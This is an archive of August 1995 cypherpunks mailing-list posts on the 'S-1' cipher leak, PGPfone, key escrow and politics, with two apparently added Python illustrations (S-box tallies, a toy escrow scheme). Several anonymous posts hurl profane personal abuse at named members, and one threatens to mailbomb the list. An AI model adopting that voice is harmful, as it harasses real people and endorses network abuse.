F2:8 = 137 (1.07) *****************

---F3 output distribution---
F3:0 = 23 (1.44) ***********************
F3:1 = 20 (1.25) ********************
F3:2 = 11 (0.69) ***********
F3:3 = 23 (1.44) ***********************
F3:4 = 17 (1.06) *****************
F3:5 = 15 (0.94) ***************
F3:6 = 13 (0.81) *************
F3:7 = 17 (1.06) *****************
F3:8 = 15 (0.94) ***************
F3:9 = 11 (0.69) ***********
F3:a =  9 (0.56) *********
F3:b = 19 (1.19) *******************
F3:c = 14 (0.88) **************
F3:d = 16 (1.00) ****************
F3:e = 14 (0.88) **************
F3:f = 19 (1.19) *******************
---by bit---
F3:1 = 140 (1.09) *****************
F3:2 = 125 (0.98) ***************
F3:4 = 125 (0.98) ***************
F3:8 = 117 (0.91) **************


===overall sum===
---F* output distribution---
F:0 =  78 (1.22) *******************
F:1 =  56 (0.88) **************
F:2 =  59 (0.92) **************
F:3 =  71 (1.11) *****************
F:4 =  64 (1.00) ****************
F:5 =  59 (0.92) **************
F:6 =  55 (0.86) *************
F:7 =  69 (1.08) *****************
F:8 =  65 (1.02) ****************
F:9 =  69 (1.08) *****************
F:a =  65 (1.02) ****************
F:b =  68 (1.06) *****************
F:c =  56 (0.88) **************
F:d =  56 (0.88) **************
F:e =  53 (0.83) *************
F:f =  81 (1.27) ********************
---by bit---
F:1 =  529 (1.03) ****************
F:2 =  521 (1.02) ****************
F:4 =  493 (0.96) ***************
F:8 =  513 (1.00) ****************
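
The tally in the message above, reworked as an added example (this is not Matt Blaze's program, and the function names are hypothetical). It takes the F0 counts from the post, builds a constructed 256-entry stand-in table with that histogram because the real S-1 tables are not on this page, recomputes the by-value and by-bit lines, and goes one step beyond the post by adding a chi-square statistic against a flat distribution.

```python
from collections import Counter

# F0 output counts for values 0x0..0xf, copied from the table in the post.
F0_COUNTS = [18, 10, 17, 15, 13, 12, 18, 14, 17, 18, 14, 17, 18, 12, 19, 24]


def table_from_counts(counts):
    """Constructed stand-in for an F table: same histogram, arbitrary order.

    Only the output counts come from the post; which input maps to which
    output is made up, since the real S-1 tables are not on this page.
    """
    return [value for value, n in enumerate(counts) for _ in range(n)]


def by_value(table, out_bits=4):
    """How many table entries produce each possible output value."""
    seen = Counter(table)
    return [seen.get(v, 0) for v in range(1 << out_bits)]


def by_bit(table, out_bits=4):
    """How many table entries have each output bit set (bit 0 first)."""
    return [sum((y >> b) & 1 for y in table) for b in range(out_bits)]


def chi_square(counts):
    """Pearson statistic of the counts against a flat distribution.

    0 means perfectly flat. For 16 bins filled with independent uniform
    values the statistic has mean 15 (its degrees of freedom).
    """
    expected = sum(counts) / len(counts)
    return sum((c - expected) ** 2 for c in counts) / expected


def report(name, table, out_bits=4):
    """Format the distribution in the same layout as the post."""
    n = len(table)
    lines = [f"---{name} output distribution---"]
    expected = n / (1 << out_bits)   # 16 for a 256-entry table
    for v, c in enumerate(by_value(table, out_bits)):
        bar = "*" * int(16 * c / expected)
        lines.append(f"{name}:{v:x} = {c:2d} ({c / expected:.2f}) {bar}")
    lines.append("---by bit---")
    expected = n / 2                 # 128 for a 256-entry table
    for b, c in enumerate(by_bit(table, out_bits)):
        bar = "*" * int(16 * c / expected)
        lines.append(f"{name}:{1 << b:x} = {c} ({c / expected:.2f}) {bar}")
    return lines


if __name__ == "__main__":
    f0 = table_from_counts(F0_COUNTS)
    print("\n".join(report("F0", f0)))
    print(f"chi-square vs flat: {chi_square(by_value(f0)):.3f}")
    # Constructed balanced table: every 4-bit value appears exactly 16 times.
    flat = [i % 16 for i in range(256)]
    print(f"chi-square, balanced table: {chi_square(by_value(flat)):.3f}")
```

The by-bit counts follow from the by-value counts alone, so the stand-in table reproduces both halves of the posted F0 listing even though its entry order is arbitrary.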




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 10 Aug 95 16:42:56 PDT
To: sameer <sameer@c2.org>
Subject: Re: Crypto = Competitive Advantage?
Message-ID: <ac4fe778000210047278@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:30 PM 8/10/95, sameer wrote:
>>
>> It seems that anything involving the Internet, the Web, and digital
>> commerce is really, really hot.
>
>        The fire that burns twice as hot burns half as long. It may be
>a cliche but it is quite applicable here I think.

Indeed. Who now recalls Jaron Lanier's virtual reality company?

(In retrospect, Jaron's error was in not finding a way to take VPL public.
VPL was the Netscape of 1990. But will Netscape be the VPL of 1992?)

Let the record show that I was not one of the tens of thousands of people
calling their brokers trying to get in on the Netscape IPO. (Though getting
in at the IPO price and selling out the same day was obviously lucrative
for a lot of folks.)

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 11 Aug 95 13:12:54 PDT
To: cypherpunks@toad.com
Subject: TIM MAY IS A CYPHERWEENIE
Message-ID: <199508102357.QAA02488@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I think we ought to just throw TIM MAY out of the list.
let's EXCOMMUNICATE HIM. it's becoming increasingly clear
that he is the source of all our problems. I mean, isn't
it obvious that our progress has stalled? who has written
any code within the last 3 days? if we got rid of him,
it would be EVOLUTION IN ACTION. this is ERIC HUGHES'
mailing list, and eric hughes knows how to write some
decent code. I mean, TCM's signature doesn't even have any
geek code, and he hasn't changed it in 4 years or so,
at least since my last grandparent died (and she was 
considerably more skillful at programming than TCM by
knowing how to make toast).

get rid of all the pricks who continually spout and spew conspiracy
theories. let TCM go and find himself a new mailing list.
that would be a fair comeuppance if he found that he couldn't
learn to do squish because he doesn't have the slightest
clue. he's a leech, a parasite, sucking on the work of
others, pretending that he is at the forefront of our
cause when he is only at the forefront of maniacal egomania.
what has he contributed to the cause? SQUAT. just a lot
of ranting about conspiracy theories and his Stock Pick
of the Week crap. "the web is really growing. people should
focus on it". well, THANK YOU VERY MUCH, MR. BRILLIANT
COMMENTATOR AND VISIONARY, T.C.MAY, I would never
have THOUGHT of that in a zillion years, but now that you
point it out, I GUESS YOU'RE RIGHT.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bshantz@nwlink.com (Brad Shantz)
Date: Thu, 10 Aug 95 17:02:36 PDT
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <199508110003.RAA02472@washington.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


>I'm tired of Perry. 

<REST DELETED>

I think that any Perry bashing can be taken offline.  I don't think that 700
people subscribed to the "I Hate Perry Metzger" list; they subscribed to
cypherpunks.

If you have anything to say to Perry, tell him in private e-mail. Don't post
a million lines of shit to the list.

Get a clue folks...

Brad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Thu, 10 Aug 95 14:04:24 PDT
To: perry@piermont.com
Subject: Re: Conspiracies and "Ciphergroupies"
In-Reply-To: <199508101943.PAA27611@panix4.panix.com>
Message-ID: <Pine.ULT.3.91.950810170000.18389A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Perry E. Metzger wrote:

> 
> This is only of interest to a very limited number of people. It's
> basically a flame about private matters. I discourage reading it.
> 

<mega-snip>

This disclaimer means nothing.  Gentlemen, this discussion is pointless.  
Please, on behalf of the little people, shut up already!

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu                         http://zeus.towson.edu/~kelli/
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 10 Aug 95 15:22:46 PDT
To: Censored Girls Anonymous <carolab@censored.org>
Subject: Re: Conspiracies and "Ciphergroupies"
In-Reply-To: <Pine.BSI.3.91.950810155403.14661A-100000@usr2.primenet.com>
Message-ID: <Pine.ULT.3.91.950810172022.9518B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 10 Aug 1995, Censored Girls Anonymous wrote:

> Robert now "Pinesigns" everything.

Yup, and it's encouraging a lot of other lay-people to investigate PGP 
and digital signatures. In the last week, I've gotten 200 or so hits on 
Pinesign and Tinsign from my homepage.  That's my purpose, get the word 
out, and it's working. :-)

> Have a fun summer...fall is coming soon, and light
> a candle for Jerry Garcia today.

uh, a candle is the last thing I'd expect most people are lighting today 
in remembrance....

> Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure

Upgrade, unsecure :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMCpqrDokqlyVGmCFAQFejAP+MhiolnfInEctzT9ihVSozbZqVbdPXJ4j
cIFugNnezRnLI7C/5ekHwLzZcEJH6MhaDgMckgIoYAs+/xyJTQs3407DO7AFx2lU
rZERB+p2Kdpp4FMq+7fTQjF36RugEozQXVCAJJ97MwUq1/6YlCBIfJliTRcLH7Jm
qsrlSFn9sE8=
=6lXM
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Aug 95 14:31:44 PDT
To: cypherpunks@toad.com
Subject: DED_hed
Message-ID: <199508102131.RAA26878@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-10-95. NYPaper Page-Oner:


   "Jerry Garcia of Grateful Dead, Icon of 60's Spirit, Dies
   at 53." By Jon Pareles, Music Critic.

   [With] "Sadness From the Streets to High Offices." By John
   Markoff.


   DED_hed







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 10 Aug 95 17:27:49 PDT
To: cypherpunks@toad.com
Subject: "Protect the children" as passphrase to Constitution
Message-ID: <ac4fef26020210044095@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I was reminded the other night by someone of the "'National security' is
the root passphrase of the Constitution." The idea being that the normal
Constitutional protections are bypassed by invocation of "national
security."

But it occurs to me that we are seeing a new variant of this: "Protect the
children."

Some recent examples:

- Clinton's Executive Order today which limits advertising of cigarettes,
limits the display of tobacco-related symbols and words on t-shirts,
baseball caps, billboards, and publicly visible signs at sports events.
(There were all kinds of details, most of them blatantly in violation of
the First Amendment. I half-watched the Clinton announcement, but didn't
take notes...consult your newspaper or the Web.)

The critical phrase: "We have to protect the children."

(Oh, and one amazing detail: the possible issuance of I.D. cards to all of
those under the age of 18. Besides being useful for things like curfews,
video tape rental prohibitions, and the cigarette ban, it would lead to
I.D. cards for those over 18, naturally (if those over 18 don't have to
carry them, then all a child less than 18 has to do is to claim not to have
to carry one because he's 18!))

- The whole Exon and V-chip debates, now likely to be passed by Congress,
are about "protecting children."

- and the Oklahoma City bombing, not that I supported it in any way, was
seen as especially horrific because of the children that were killed. This
means that restrictive legislation, such as bans on explosives information,
guns, etc., can be justified as measures to "protect children."

And so on.

Now clearly this strategy will be welcomed by many. It's hard to argue
against children and against the "protection of children." Arguing the
Constitutional side is tough when "the children" are at issue.

More speculatively, I think Clinton has hit on this strategy as a way to
line up support from the Republican majority in Congress on many key
issues. There may even be repercussions for welfare and health care issues
(which Clinton can also cast as "protect the children" issues).

The potential crypto relevance? Look for arguments about limiting access to
strong crypto to be more heavily focussed on "pedophiles" and
"pornographers." Look for calls to have a national I.D. card--which serves
many State-needed purposes (and I don't mean in terms of Revelations). A
national I.D. card could then be tied in to GAK/escrow systems.

"We have to protect the children."

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: corondan@eng.eds.com (George A. Corondan (corondan@eng.eds.com))
Date: Thu, 10 Aug 95 15:06:08 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <9508102205.AA23622@earth.troy.eng.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 10, 12:02pm, David G. Koontz wrote:
> Subject: Re: "S1" encryption system (was: this looked like it might be int
> >Jon writes:
> >> Two other possibilities: (1) It's merely an independently produced 
> >> cryptosystem disguised as a "leak" to save its creator the trouble of 
> >> asking experts to analyze it for him/her.  
> 
> >It strikes me as rather foolish to mail off anonymous copies to several
> >individual recipients (Matt, Perry, Tim, ...) in addition to the list, if
> >S1 is a real leak. Why aid the traffic analysts by firing off multiple
> >messages through the remailers ?
> 
> A third possibility comes to mind, that person or persons associated with
> the list are using the post to focus on cryptographic efforts in lieu of
> political or apocalyptic diatribes.

how about a fourth possibility:  the government ___ agency did it.

this was done to achieve two goals:
	1) make cypherpunks easy to vilify (look at all of the nasty crypto
		stuff being passed to foreign nationals)
	2) a quick estimate of cypherpunks' ability to analyze an algorithm

am i being too paranoid?  probably, but you tell me :-).

-- 
George A. Corondan        Inet: corondan@eng.eds.com
E.D.S. Mail Stop 4251     Voice: (810)265-2937
800 Tower Drive           FAX: (810)265-3432
Troy, MI 48098-7019




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Thu, 10 Aug 95 16:29:34 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199508102329.SAA21100@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


will someone just CUT THE @#$%^&* FOSTER CONSPIRACY THEORIES??
I'm getting F---ING SICK AND TIRED of all the BULL**** that
is being posted to this F---ING LIST!!!! does anyone give
a flying f--- whether Foster was killed or suicided or
hit by a bus?!?!?! WHAT DOES THIS HAVE TO DO WITH CYPHERPUNKS?
WHAT DOES THIS HAVE TO DO WITH CODE???

PARRY IS RIGHT. everyone else who disagrees can KISS MY ASS.
sign up for the PLAN TO ENCRYPT CYBERSPACE. parry is the man
to start with. he will get you started on his campaign like
any good drill instructor. oh yes, so many of you pansies
need to get into a serious digital BOOT camp. learn some real
manly things for a change!!!  besides gossiping and tittering
like grizzled grandmothers who haven't a clue or a life!!!

he's right, little TIMMY MAY
hasn't done one @#$%^&* productive thing in the last 5 years
after he quit Intel. oh yeah, he is raking in cash off all
his little darling stocks, but what the hell does he have
to say that is even slightly relevant to coding? my god,
here is a guy that barely even knows what linux IS, let alone
how to install it. I bet he thinks that "bash" is something
you do to the NSA!!! oh yeah, he goes to his silly little
"mind masturbating and drug fondling" parties every few
days with all the Hoi Polloi Holier-Than-Thou pricks of
the world, the "cum of the net" ejaculating all over each
other, hehehehehehe what a bunch of effeminate nobodies...

PARRY is the premier cypherpunk. he should be worshipped
by everyone. he has written dozens of RFCS which have made
cyberspace a far better place as we know it. if you don't
contribute to his solution, YOU ARE PART OF THE PROBLEM.
PARRY is part of the solution. HINT FOR THE CLUELESS: 
GET WITH THE PROGRAM. don't you think that you are being
the most scurrilous swine for taking up PARRY's time with
your filling up this mailing list with GARBAGE? TRASH?
EXCREMENT? ODIOUS EFFLUVIA??? don't you know that it cuts
into his insanely precious programming time by hours to have
to monitor this list closely to see if anyone posted some
boneheaded conspiracy theory or insulted him??? that
TAKES PRECIOUS TIME THAT HE COULD BE SPENDING TRADING
PROGRAMMING TECHNIQUES WITH BRILLIANT PEOPLE WHO KNOW
UNIX SOFTWARE AND HOW TO WRITE A CORRECT DNS LOOKUP VIA
SOCKET LIBRARIES. are we cypherpunks, or cypherprogrammers?
GET A CLUE, PEOPLE.

I SWEAR if I see one more FORWARDED ARTICLE TO THIS GROUP,
I'M GOING TO MAILBOMB THE WHOLE LIST. that'll teach the
@#$^%^&* bastards to mess with MY VALUABLE TIME.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Thu, 10 Aug 95 17:00:13 PDT
To: cypherpunks@toad.com
Subject: Is there a 12 step group in the house?
Message-ID: <Pine.BSI.3.91.950810185532.28698A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Sounds like someone needs a meeting.
There are groups for obsessive/compulsive activity.

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Thu, 10 Aug 95 17:10:32 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <9508102205.AA23622@earth.troy.eng.eds.com>
Message-ID: <m0sghYj-001g5mC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


George A. Corondan (corondan@eng.eds.com) wrote:

> > >It strikes me as rather foolish to mail off anonymous copies to several
> > >individual recipients (Matt, Perry, Tim, ...) in addition to the list, if
> > >S1 is a real leak. Why aid the traffic analysts by firing off multiple
> > >messages through the remailers ?
> > 
> > A third possibility comes to mind, that person or persons associated with
> > the list are using the post to focus on cryptographic efforts in lieu of
> > political or apocalyptic diatribes.

> how about a fourth possibility:  the government ___ agency did it.

Can't play that game too much or you'll be in a padded room somewhere, 
probably a Federal mental hospital with no name..... ;-)

> this was done to achieve two goals:

> 	1) make cypherpunks easy to vilify (look at all of the nasty crypto
> 		stuff being passed to foreign nationals)

> 	2) a quick estimate of cypherpunks' ability to analyze an algorithm

I'd say it was trashed in under 5 messages.

> am i being too paranoid?  probably, but you tell me :-).

If the algorithm is compiled, supplied with a key and decrypts skipjack
/clipper/bubbaheres then you know it's real.


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Thu, 10 Aug 95 18:45:16 PDT
To: cypherpunks@toad.com
Subject: Re: DETWEILLER
In-Reply-To: <Pine.SUN.3.91.950802144812.22631E-100000@crl5.crl.com>
Message-ID: <fQrKwkkAsWoX084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Sandy Sandfort <sandfort@crl.com> wrote:

> > > ObCypherpunk: Anybody heard from Detweiller?
> 
> Actually, he was at the last Bay Area Cypherpunks physical 
> meeting under another name.

And the Cypherpunk Merry Prankster who surreptitiously replaced
his Thorazine with Tic-Tacs now owes the list an apology! :-Q


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 10 Aug 95 19:56:20 PDT
To: cypherpunks@toad.com
Subject: PRZ encrypted voice software release imminent
Message-ID: <199508110254.TAA02204@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



as if PRZ is not already enough of a folk hero....
BTW, he has been beat by Nautilus, right? Nautilus
is public domain, right? (I'm thinking of that public
domain voice encryption released a few mos ago).
I wonder if he is going to try to put a "spin" on this
one to differentiate it from the other one. on the 
other hand, just having his name on it is plenty of
"spin"...


------- Forwarded Message


- ------- Forwarded Message

Date: Thu, 10 Aug 1995 06:47:31 -0400 (EDT)
From: Brad Dolan <bdolan@use.usit.net>
Subject: Washington Whisper from U.S. News (fwd)



- - ---------- Forwarded message ----------
Date: Wed, 9 Aug 1995 21:26:42 -0700
Subject: Washington Whisper from U.S. News


From: Vic Sussman <vic@clark.net>

 
U.S.NEWS & WORLD REPORT, AUGUST 14, 1995
 
TAPS FOR THE CODE BREAKERS
 
The cryptographer who riled the federal government over his popular
encryption software, PGP (``Pretty Good Privacy''), claims he is only a
few weeks away from launching yet another dazzling piece of software:
PGPfone. Philip Zimmermann's latest product permits virtually untappable
telephone conversations through personal computers. But the launch of the
software, which uses military-grade encryption to scramble transmissions,
is likely to sharpen the debate among those who worry about such
technology falling into criminal or enemy hands and those who consider it
essential for secure communications, especially on the Internet. In a test
of the new software last week, a U.S. NEWS writer, using a
microphone-equipped laptop in Washington, found the encrypted conversation
with Zimmermann in Boulder, Colo., to be remarkably clear. Zimmermann, who
ran afoul of the government over charges--strongly denied--that he
illegally ``exported'' the PGP software on the Internet, says he plans to
give away his new software for free. Why? ``I can't simply stop doing what
I do because I'm afraid of angering the government,'' he says. ``Americans
have a right to private conversations.''
 
Copyright, 1995, U.S. News & World Report All rights reserved.


.............................................................................
Vic Sussman                    : "Lines of light ranged in the nonspace
U.S. News & World Report       : of the mind, clusters and constellations
vic@clark.net                  : of data. Like city lights, receding..."
http://www.clark.net/pub/
journalism/vic.html            :   _Neuromancer_     William Gibson
..............................................................................







- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 10 Aug 95 17:23:37 PDT
To: cypherpunks@toad.com
Subject: It may be time to electrify the floor...
Message-ID: <v02120d09ac5051709fef@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


 ... because we seem to be in the throes of a listwide piss-fight.

Unless we're the victim of duelling rant generators -- but I don't think
this is the case, as they all happened too fast.

It's a nice night. Maybe I'll go sit on the back porch and smoke the
base-ball-bat Macanudo (cigar) I bought at Erlich's today...

See you all in the morning. Don't forget to insulate yourselves, everyone...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 10 Aug 95 20:38:33 PDT
To: CYPHERPUNKS@toad.com
Subject: If only Vxxxx Fxxxxx had used encryption....
Message-ID: <8AEE4DC.0003000301.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


 C'punks:

                [Wait!  This =is= crypto-related!  I promise!]

  Heard on the news today that Bernard Nussbaum said he had done
"nothing irregular" in going through Vince Foster's effects immediately
after his demise, in order to secure "sensitive information".
Presumably, Nussbaum's contention is that some of the information in
Foster's possession was covered by attorney-client privilege, and
therefore the Authorities had no right to take it into possession.

                 (IANAL-Comments from those who are?)

  Anyway, this case got me to thinking: If Vince had kept all his
"sensitive" things encrypted, and never written down the passphrase,
then the data would effectively have died with him. In this case, lack
of key escrow is not a bug, but a feature!

  Then I thought some more - that the whole Key Escrow thing needs to be
rethought: Instead of escrowing the private key, we need to develop
better key management techniques for multiple recipients.

  For example, if Alice is an attorney representing Carol Client, Bob
and Ray are partners in Alice's firm, which uses escrow agent E; and A,
B, C, R and E are the public keys (and A'... are the private keys) of
our dramatis personae:

  Carol sends her message to Alice as usual, generating the session key
S, and encrypting it S'=A(S).

  Whenever Alice receives a message, after decrypting the session key
[S= A'(S')] she adds to it an additional S"= E( B(S) ) and S"'= E( R(S)
) or some other construct involving Shamir Sharing or whatever.
The details of the protocol(s) can be worked out after the basic premise:

       There is no reason for anyone to give up the "master key" to all
     of their business, when the minimal overhead in storage space for
     adding an escrowed =session= key will suffice.

  PGP needs a mechanism to handle "detached session keys", so that our
escrow agent can, upon notification by Bob and Ray that Alice has [died
| left the firm], process the whole package of S" and S"' back into B(S)
and R(S), so that Bob and Ray can carry on their work. Just as with a
detached signature certificate going to a notary, the detached session
key does not give the escrow agent any knowledge of the content of the
message itself.

  Another option is to put the whole creation of S" and S"' on to Carol,
which requires a public key that specifies E and {B, R}, as well as the
particular escrow protocol involved. This could be tricky to implement.

  Also, Carol needs to be able to specify to Alice that she is retaining
a copy of the communication, encrypted to self, and therefore Alice need
not escrow the session key for this particular message.


  Comments?



 * "All authority belongs to the people"
-Thomas Jefferson
---
 * Monster@FAmend.Com *    
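
The escrowed-session-key flow proposed in the message above, worked through as an added example (not part of the original post and not PGP code). It assumes toy textbook RSA without padding, constructed keys built from Mersenne primes, and a SHA-256 keystream standing in for the symmetric cipher; all function names are hypothetical.

```python
"""Toy model of the escrowed-session-key idea: textbook RSA, no padding, tiny
constructed keys. For illustration only; this is not PGP code."""
import hashlib
import secrets

PUB_EXP = 65537

def make_key(p, q):
    """Build a toy RSA key pair (public, private) from two primes."""
    n = p * q
    d = pow(PUB_EXP, -1, (p - 1) * (q - 1))
    return (n, PUB_EXP), (n, d)

def rsa(key, value):
    """Textbook RSA: the same operation encrypts (public) or decrypts (private)."""
    n, exponent = key
    if not 0 <= value < n:
        raise ValueError("value does not fit under this modulus")
    return pow(value, exponent, n)

# Constructed keys from Mersenne primes. The moduli grow A < B < R < E so that
# S fits under every key and B(S), R(S) fit under the escrow agent's key.
A_PUB, A_PRIV = make_key(2**13 - 1, 2**17 - 1)    # Alice
B_PUB, B_PRIV = make_key(2**19 - 1, 2**31 - 1)    # Bob
R_PUB, R_PRIV = make_key(2**61 - 1, 2**89 - 1)    # Ray
E_PUB, E_PRIV = make_key(2**107 - 1, 2**127 - 1)  # escrow agent

def stream_xor(session_key, data):
    """Stand-in symmetric cipher: XOR with a SHA-256 counter keystream."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        block = session_key.to_bytes(8, "big") + counter.to_bytes(4, "big")
        stream += hashlib.sha256(block).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))

def carol_send(plaintext, session_key=None):
    """Carol picks S, encrypts the body with it and sends S' = A(S)."""
    if session_key is None:
        session_key = secrets.randbelow(A_PUB[0] - 2) + 2
    return {"wrapped_for_alice": rsa(A_PUB, session_key),
            "body": stream_xor(session_key, plaintext)}

def alice_receive(message):
    """Alice recovers S = A'(S') and builds S'' = E(B(S)), S''' = E(R(S))."""
    s = rsa(A_PRIV, message["wrapped_for_alice"])
    escrow_packets = {"bob": rsa(E_PUB, rsa(B_PUB, s)),
                      "ray": rsa(E_PUB, rsa(R_PUB, s))}
    return stream_xor(s, message["body"]), escrow_packets

def escrow_release(escrow_packets):
    """The agent strips only its own layer, yielding B(S) and R(S), never S."""
    return {name: rsa(E_PRIV, packet) for name, packet in escrow_packets.items()}

def partner_read(private_key, released_packet, body):
    """Bob or Ray removes the inner layer to get S, then decrypts the body."""
    return stream_xor(rsa(private_key, released_packet), body)

if __name__ == "__main__":
    text = b"Carol to Alice: constructed sample message"
    msg = carol_send(text)
    _, packets = alice_receive(msg)
    released = escrow_release(packets)
    print(partner_read(B_PRIV, released["bob"], msg["body"]))
    print(partner_read(R_PRIV, released["ray"], msg["body"]))
```

Alice's private key never leaves her machine, and what the escrow agent holds after stripping its layer is still encrypted to Bob or Ray. A real design would use padded public-key encryption, where nesting by modulus size is not an issue.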




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 11 Aug 95 01:55:14 PDT
To: cypherpunks@toad.com
Subject: Re:  More "S-1" foolishness
Message-ID: <199508110353.UAA04743@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The other thing I noticed that really makes me question this is that G1
only uses 4 of its 8 input bits.  As I wrote, it is equivalent to
parity(i&0x17).  A bit is a terrible thing to waste, and it is hard to
imagine why it would do this intentionally.  G1 may not be that important
an element of the cipher but why throw away four bits?

It is possible I suppose that the F and G boxes are not the ones used
in the "real" version of whatever cipher this is, so this apparent
weakness and the ones which Matt has pointed out may not be that
significant.

Hal
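
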